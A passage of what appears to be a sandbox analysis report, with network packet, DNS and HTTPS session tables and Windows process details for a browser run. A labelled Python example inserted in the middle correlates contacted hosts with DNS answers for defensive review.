Apr 25, 2024 15:13:17.246813059 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.254128933 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.254152060 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.254471064 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.258306026 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.300127983 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.668567896 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.668586016 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.668628931 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.668821096 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.668837070 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.668853998 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.669002056 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.675331116 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.675345898 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.675374031 CEST | 49725 | 443 | 192.168.2.5 | 52.165.165.26 |
Apr 25, 2024 15:13:17.675381899 CEST | 443 | 49725 | 52.165.165.26 | 192.168.2.5 |
Apr 25, 2024 15:13:17.681665897 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:17.681704044 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.681895971 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:17.682029009 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:17.682053089 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.937604904 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.937985897 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:17.938010931 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.939155102 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.939994097 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:17.940212965 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:17.993009090 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:27.930561066 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:27.930646896 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Apr 25, 2024 15:13:27.930701971 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:29.745263100 CEST | 49726 | 443 | 192.168.2.5 | 142.250.9.104 |
Apr 25, 2024 15:13:29.745291948 CEST | 443 | 49726 | 142.250.9.104 | 192.168.2.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 25, 2024 15:12:13.521466970 CEST | 62382 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:13.521608114 CEST | 54001 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:13.628976107 CEST | 53 | 63993 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:13.641753912 CEST | 53 | 50992 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:14.306515932 CEST | 53 | 55828 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:16.724708080 CEST | 64289 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:16.725131035 CEST | 60640 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:17.623420954 CEST | 52383 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:17.623780012 CEST | 50069 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 25, 2024 15:12:17.734462023 CEST | 53 | 52383 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:17.734529972 CEST | 53 | 50069 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:31.313211918 CEST | 53 | 51181 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:12:56.654637098 CEST | 53 | 58864 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:13:13.440411091 CEST | 53 | 51722 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:13:13.444080114 CEST | 53 | 63906 | 1.1.1.1 | 192.168.2.5 |
Apr 25, 2024 15:13:43.933370113 CEST | 53 | 57357 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 25, 2024 15:12:13.521466970 CEST | 192.168.2.5 | 1.1.1.1 | 0x325e | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Apr 25, 2024 15:12:13.521608114 CEST | 192.168.2.5 | 1.1.1.1 | 0xb8e | Standard query (0) | | 65 (HTTPS) | IN (0x0001) | false |
Apr 25, 2024 15:12:16.724708080 CEST | 192.168.2.5 | 1.1.1.1 | 0x51a9 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Apr 25, 2024 15:12:16.725131035 CEST | 192.168.2.5 | 1.1.1.1 | 0xd005 | Standard query (0) | | 65 (HTTPS) | IN (0x0001) | false |
Apr 25, 2024 15:12:17.623420954 CEST | 192.168.2.5 | 1.1.1.1 | 0x4472 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Apr 25, 2024 15:12:17.623780012 CEST | 192.168.2.5 | 1.1.1.1 | 0x4d11 | Standard query (0) | | 65 (HTTPS) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 25, 2024 15:12:13.633373976 CEST | 1.1.1.1 | 192.168.2.5 | 0xb8e | No error (0) | | www.irs.gov.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
Apr 25, 2024 15:12:13.633708954 CEST | 1.1.1.1 | 192.168.2.5 | 0x325e | No error (0) | | www.irs.gov.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
Apr 25, 2024 15:12:16.835016966 CEST | 1.1.1.1 | 192.168.2.5 | 0xd005 | No error (0) | | www.irs.gov.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
Apr 25, 2024 15:12:16.836611986 CEST | 1.1.1.1 | 192.168.2.5 | 0x51a9 | No error (0) | | www.irs.gov.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false |
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | | | 142.250.9.104 | A (IP address) | IN (0x0001) | false |
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | | | 142.250.9.147 | A (IP address) | IN (0x0001) | false |
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | | | 142.250.9.99 | A (IP address) | IN (0x0001) | false |
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | | | 142.250.9.103 | A (IP address) | IN (0x0001) | false |
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | | | 142.250.9.105 | A (IP address) | IN (0x0001) | false |
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | | | 142.250.9.106 | A (IP address) | IN (0x0001) | false |
Apr 25, 2024 15:12:17.734529972 CEST | 1.1.1.1 | 192.168.2.5 | 0x4d11 | No error (0) | | | | 65 (HTTPS) | IN (0x0001) | false |
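The TCP, DNS-query and DNS-answer tables above are the raw material a sandbox correlates when it decides whether a contacted host was ever named by a DNS answer in the capture. The script below is an added example, not part of this report and not Joe Sandbox's own code: it re-implements that correlation over a handful of rows copied (trimmed) from the tables above, and it converts the CEST timestamps of the packet tables into the UTC form the HTTPS session tables use so the two can be lined up. The function names, the sample row strings and the assumed 192.168.2.0/24 guest network are this example's own.

```python
"""Correlate outbound TCP destinations with DNS answers from a sandbox report.

Added example, not part of the report or of the sandbox's own code.  The row
strings below are constructed samples copied (trimmed) from the tables above;
the helper names and the 192.168.2.0/24 guest network are assumptions.
"""
import ipaddress
from datetime import datetime, timedelta

# Constructed sample: subset of the DNS-answer rows, cells in header order:
# Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DoH
# The Name column is blank in the extracted report, so it is blank here too.
DNS_ANSWERS = """\
Apr 25, 2024 15:12:13.633373976 CEST | 1.1.1.1 | 192.168.2.5 | 0xb8e | No error (0) | | www.irs.gov.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | | | 142.250.9.104 | A (IP address) | IN (0x0001) | false
Apr 25, 2024 15:12:17.734462023 CEST | 1.1.1.1 | 192.168.2.5 | 0x4472 | No error (0) | | | 142.250.9.147 | A (IP address) | IN (0x0001) | false
"""

# Constructed sample: subset of the TCP rows:
# Timestamp | Source Port | Dest Port | Source IP | Dest IP
TCP_PACKETS = """\
Apr 25, 2024 15:12:28.953175068 CEST | 49717 | 443 | 192.168.2.5 | 142.250.9.104
Apr 25, 2024 15:12:29.321106911 CEST | 49703 | 443 | 192.168.2.5 | 23.1.237.91
Apr 25, 2024 15:12:29.360703945 CEST | 49720 | 443 | 192.168.2.5 | 52.165.165.26
Apr 25, 2024 15:12:29.478749037 CEST | 443 | 49703 | 23.1.237.91 | 192.168.2.5
"""

GUEST_NET = ipaddress.ip_network("192.168.2.0/24")  # assumed: the 192.168.2.5 guest's subnet
TZ_OFFSETS = {"CEST": timedelta(hours=2), "CET": timedelta(hours=1), "UTC": timedelta(0)}


def split_row(line):
    """Split one 'a | b | c' table row into stripped cells."""
    return [cell.strip() for cell in line.split("|")]


def rows(text):
    """Yield the cell lists of every non-empty row in a table dump."""
    for line in text.splitlines():
        if line.strip():
            yield split_row(line)


def to_utc(stamp):
    """'Apr 25, 2024 15:12:29.360703945 CEST' -> '2024-04-25 13:12:29 UTC',
    the format the report's HTTPS session tables use.  The nanosecond
    fraction is dropped because strptime only understands microseconds."""
    local_part, tz = stamp.rsplit(" ", 1)
    local_part = local_part.split(".")[0]
    local = datetime.strptime(local_part, "%b %d, %Y %H:%M:%S")
    return (local - TZ_OFFSETS[tz]).strftime("%Y-%m-%d %H:%M:%S UTC")


def parse_dns_answers(text):
    """Map every address delivered by an A/AAAA answer to its transaction ID.
    CNAME rows (and blank Address cells) carry no address and are skipped."""
    resolved = {}
    for cells in rows(text):
        trans_id, address = cells[3], cells[7]
        try:
            resolved[str(ipaddress.ip_address(address))] = trans_id
        except ValueError:
            continue
    return resolved


def outbound_destinations(text):
    """First client->server packet per destination: {dst: (timestamp, dport)}.
    Only packets whose source lies inside the guest network count as outbound."""
    first_seen = {}
    for ts, sport, dport, src, dst in (cells[:5] for cells in rows(text)):
        if ipaddress.ip_address(src) in GUEST_NET:
            first_seen.setdefault(dst, (ts, int(dport)))
    return first_seen


def find_unresolved(tcp_text, dns_text):
    """Destinations contacted over TCP that no DNS answer in the capture named,
    as sorted (dst, dport, first_seen_utc) tuples."""
    resolved = parse_dns_answers(dns_text)
    return sorted(
        (dst, dport, to_utc(ts))
        for dst, (ts, dport) in outbound_destinations(tcp_text).items()
        if dst not in resolved
    )


if __name__ == "__main__":
    for dst, dport, seen in find_unresolved(TCP_PACKETS, DNS_ANSWERS):
        print(f"{seen}  {dst}:{dport}  contacted without a matching DNS answer")
```

On the sample rows the script flags 23.1.237.91 and 52.165.165.26 and clears 142.250.9.104, which transaction 0x4472 resolved. Treat a flagged host as a prompt for review rather than proof of a hard-coded address: the A records behind a CNAME chain may have arrived in a reply outside the captured window, the OS or browser may have served the address from cache, and the "DNS over HTTPS: false" column only says these particular queries went over plain UDP. Also keep the time zones straight when lining the tables up: the packet tables are stamped CEST, the HTTPS session tables UTC, two hours apart.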
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49718 | 184.31.62.93 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-04-25 13:12:18 UTC | 161 | OUT | |
2024-04-25 13:12:18 UTC | 467 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.5 | 49719 | 184.31.62.93 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-04-25 13:12:18 UTC | 239 | OUT | |
2024-04-25 13:12:19 UTC | 515 | IN | |
2024-04-25 13:12:19 UTC | 55 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.5 | 49720 | 52.165.165.26 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-04-25 13:12:30 UTC | 306 | OUT | |
2024-04-25 13:12:30 UTC | 560 | IN | |
2024-04-25 13:12:30 UTC | 15824 | IN | |
2024-04-25 13:12:30 UTC | 8666 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.5 | 49725 | 52.165.165.26 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-04-25 13:13:17 UTC | 306 | OUT | |
2024-04-25 13:13:17 UTC | 560 | IN | |
2024-04-25 13:13:17 UTC | 15824 | IN | |
2024-04-25 13:13:17 UTC | 9633 | IN |
Target ID: | 0 |
Start time: | 15:12:10 |
Start date: | 25/04/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff742d70000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 15:12:10 |
Start date: | 25/04/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 15:12:10 |
Start date: | 25/04/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff715980000 |
File size: | 3'242'272 bytes |
MD5 hash: | 45DE480806D1B5D462A7DDE4DCEFC4E4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 15:12:11 |
Start date: | 25/04/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff715980000 |
File size: | 3'242'272 bytes |
MD5 hash: | 45DE480806D1B5D462A7DDE4DCEFC4E4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |